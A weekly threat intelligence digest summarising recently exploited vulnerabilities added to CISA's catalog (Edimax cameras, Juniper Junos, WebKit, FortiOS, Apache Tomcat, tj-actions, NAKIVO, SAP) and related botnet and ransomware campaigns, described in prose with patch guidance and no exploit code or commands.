This week, the cybersecurity landscape witnessed a surge in exploitations and malicious activities, emphasizing the growing risks posed by unpatched vulnerabilities and sophisticated cyber threats. The Cybersecurity and Infrastructure Security Agency (CISA) added seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, impacting major vendors such as Apple, Fortinet, Edimax, NAKIVO, Juniper, SAP, and tj-actions. Apart from this, an actively exploited vulnerability in Apache Tomcat underscores the urgency for organizations to implement timely security patches.

Botnet activity spiked significantly, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeting vulnerabilities in Spring Cloud Gateway, GitLab, and PHP, while Bashlite, BrickerBot, Tsunami, and Mirai escalated their attacks on Eir D1000 modems, reinforcing the persistent threats faced by IoT devices.

Security researchers have identified multiple cyber threats targeting enterprises and critical infrastructure. Akamai’s SIRT reported ongoing exploitation of a command injection vulnerability in Edimax IC-7100 cameras to deploy Mirai botnet variants. Mandiant linked China-backed UNC3886 to custom backdoors in Juniper Networks’ Junos OS routers, while Forescout uncovered Russian group Mora_001 exploiting FortiOS and FortiProxy vulnerabilities to deploy SuperBlack ransomware. Armis Labs analyzed Medusa ransomware, integrating intelligence from FBI, CISA, and MS-ISAC.  

Additionally, ReliaQuest highlighted continued exploitation of Fortinet VPN vulnerabilities for large-scale credential theft and administrative control. These findings underscore the urgent need for proactive security measures, patch management, and strengthened defenses against evolving cyber threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-1316

An OS Command Injection Vulnerability in the Edimax IC-7100 network camera allows attackers to achieve remote code execution on vulnerable devices through specially crafted requests. Rated critical with a CVSS score of 9.8, this flaw affects all versions of the device. Additionally, the impacted products have reached End-of-Life (EoL) and End-of-Support (EoS) status, meaning they will no longer receive security updates, leaving them permanently vulnerable. Given the active exploitation risk, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

‍CVE-2025-21590

An Improper Isolation or Compartmentalization Vulnerability in Juniper Networks Junos OS allowed local attackers with shell access to execute arbitrary code, posing a significant security risk. Juniper Networks has released patches for this flaw in multiple versions, including 21.2R3-S9, 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 23.4R2-S4, 24.2R1-S2, and the latest releases 24.2R2 and 24.4R1. A high-privilege local attacker could leverage this vulnerability to inject malicious code, potentially compromising affected devices. The company's Security Incident Response Team (SIRT) confirmed at least one instance of malicious exploitation, leading to its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog.

‍CVE-2025-24201

An Out-of-Bounds Write Vulnerability in the WebKit browser engine could allow remote attackers to craft malicious web content that escapes the Web Content sandbox, potentially leading to arbitrary code execution or full system compromise. Apple has confirmed that this zero-day vulnerability has been actively exploited in the wild through highly sophisticated attacks, underscoring its critical severity. In response, Apple has released security updates for visionOS 2.3.2, iOS 18.3.2, iPadOS 18.3.2, macOS Sequoia 15.3.2, and Safari 18.3.1, urging users to apply patches immediately. Given the active exploitation, this vulnerability has also been added to the CISA KEV catalog, further reinforcing the urgency of remediation.

‍CVE-2025-24472

An Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy allows remote attackers to gain super-administrator privileges through an alternate path or channel. Assigned a high CVSS Score of 8.1, this flaw affects FortiOS versions 7.0.0 through 7.0.16 and FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12. Fortinet has released security patches to address this vulnerability, urging organizations to apply updates promptly to mitigate potential exploitation. Given the severity of the flaw, it has also been added to the CISA KEV Catalog, signaling an increased risk of active attacks.

‍CVE-2025-24813

A Remote Code Execution Vulnerability in Apache Tomcat poses a severe risk, allowing attackers to take control of affected servers using a simple PUT request. Rated as critical, with a CVSS Score of 9.8, this flaw has been actively exploited in the wild, especially after a public proof-of-concept (PoC) was released just 30hrs post-disclosure. Apache has addressed this issue in versions 9.0.99, 10.1.35, and 11.0.3, urging organizations to update immediately to mitigate potential threats.

‍CVE-2025-30066

A Malicious Code Injection Vulnerability has been identified in the tj-actions/changed-files GitHub Action, potentially exposing sensitive information through actions logs. Rated as high with a CVSS Score of 8.6, this vulnerability could enable remote attackers to gain unauthorized access. Developers and organizations using this GitHub Action should immediately update to version 46.0.1. to protect their workflows. The vulnerability has been added to the CISA KEV catalog, indicating acknowledging active exploitation in the wild.

‍CVE-2024-48248

An Absolute Path Traversal Vulnerability in the NAKIVO Backup and Replication allows attackers to read arbitrary files from the system, potentially exposing sensitive data. Rated high with a CVSS Score of 8.6, the flaw was discovered by a watchtower security researcher in version 10.11.3.86570, though earlier versions remain unverified. The vulnerability resides in the Director Component, which serves as NAKIVO's central management HTTP interface. While NAKIVO has silently patched the issue in version 11.0.0.88174, the risk remains for unpatched deployments. Due to its potential for exploitation, this vulnerability has been added to the CISA KEV catalog, urging organizations to update immediately to mitigate threats.

‍CVE-2017-12637

A Directory Traversal Vulnerability in the SAP NetWeaver Application Server (AS) allows remote attackers to read arbitrary files by leveraging as ".." (dot-dot) sequence in the query string. With a CVSS Score of 7.5 (High), this flaw has been actively exploited since at least August 2017, demonstrating its long-standing risk. Despite being eight years old, it continues to pose a security threat to unpatched systems. Recognizing its exploitation in the wild, CISA has recently added this vulnerability to its KEV catalog, urging organizations to assess their SAP deployments.  

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

‍CVE-2025-1316

Akamai's Security Intelligence Response Team (SIRT) has identified an ongoing exploitation of a command injection vulnerability in Edimax IC-7100 network cameras, which threat actors have been leveraging since at least May 2024 to deploy Mirai botnet variants. Researchers have observed at least two distinct Mirai variants, one of which includes anti-debugging capabilities before executing a shell script that retrieves the malware for multiple architectures. The ultimate objective of these campaigns is to assemble a botnet of compromised devices to launch distributed denial-of-service (DDoS) attacks using TCP and UDP protocols. Upon successfully gaining access, attackers execute a remote command injection exploit, triggering a shell script that downloads the Mirai malware payload from a remote server, further expanding their botnet infrastructure.

‍CVE-2025-21590

In mid-2024, Mandiant uncovered that UNC3886, a China-linked espionage group, had deployed custom backdoors on Juniper Networks Junos OS routers. These TinyShell-based backdoors exhibited varied capabilities, including active and passive access, along with an embedded script designed to disable logging mechanisms on compromised devices. Further investigation revealed that UNC3886 bypassed security protections by injecting malicious code into the memory of legitimate processes, a technique now tracked as CVE-2025-21590.

‍CVE-2025-24472

Forescout researchers have identified Mora_001, a Russian hacking group, actively exploiting FortiOS and FortiProxy vulnerabilities to compromise Fortinet products. The group is suspected of utilizing the LockBit builder to develop its own ransomware variant, dubbed SuperBlack. Mora_001 strategically focuses on high-value assets. such as servers and domain controllers, employing WMIC for system discovery and SSH for lateral movement. True to modern ransomware tactics, the group ensures data exfiltration is completed before deploying the ransomware, maximizing their leverage over victims.

‍Medusa Ransomware: Exploiting Public-Facing Vulnerabilities for Initial Access

Armis Labs has released a detailed analysis of Medusa Ransomware, integrating intelligence from multiple sources, including FBI, CISA, and MS-ISAC. The report outlines Medusa's tactics, techniques, and procedures, indicators of compromise, and mitigation strategies to help organizations defend against this evolving threat. One of Medusa’s primary attack vectors involves the exploitation of public-facing applications by targeting unpatched vulnerabilities in internet-facing systems. Notably, the ransomware has been observed exploiting Microsoft Exchange Server vulnerabilities, (ProxyShell, CVE-2021-34473), an authentication bypass flaw in ScreenConnect (CVE-2024-1709), and a SQL injection vulnerability in Fortinet EMS (CVE-2023-48788). These exploits allow attackers to gain initial access, deploy ransomware, and disrupt critical operations, reinforcing the need for timely patching and proactive defense measures.

‍Persistent Exploitation of Fortinet VPN Vulnerabilities by Cybercriminals and APT Groups

Recent Investigations from ReliaQuest highlight that Fortinet VPN-related vulnerabilities, such as CVE-2022-40684 and CVE-2018-13379, continue to be exploited by threat actors for large-scale credential theft and administrative control. Despite being disclosed years ago, these vulnerabilities remain integral to cybercriminal and nation-state attack strategies. CVE-2022-40684 was notably leveraged in 2025, by the Belsen_Group gang, granting attackers super-admin privileges over VPN infrastructure and enabling highly automated attacks. Meanwhile, CVE-2018-13379 has been actively exploited by state-sponsored APT groups like Russia-backed APT28 and Iran-backed MuddyWater, allowing them to maintain persistent access to compromised networks for prolonged espionage and operational disruption.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/03/19/cisa-adds-three-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/03/18/cisa-adds-two-known-exploited-vulnerabilities-catalog  
3. https://www.reliaquest.com/blog/credential-theft-vs-admin-control-threat-spotlight/  
4. https://www.armis.com/blog/breaking-down-medusa-ransomware/
5. https://www.cisa.gov/news-events/alerts/2025/03/13/cisa-adds-two-known-exploited-vulnerabilities-catalog  
6. https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/
7. https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers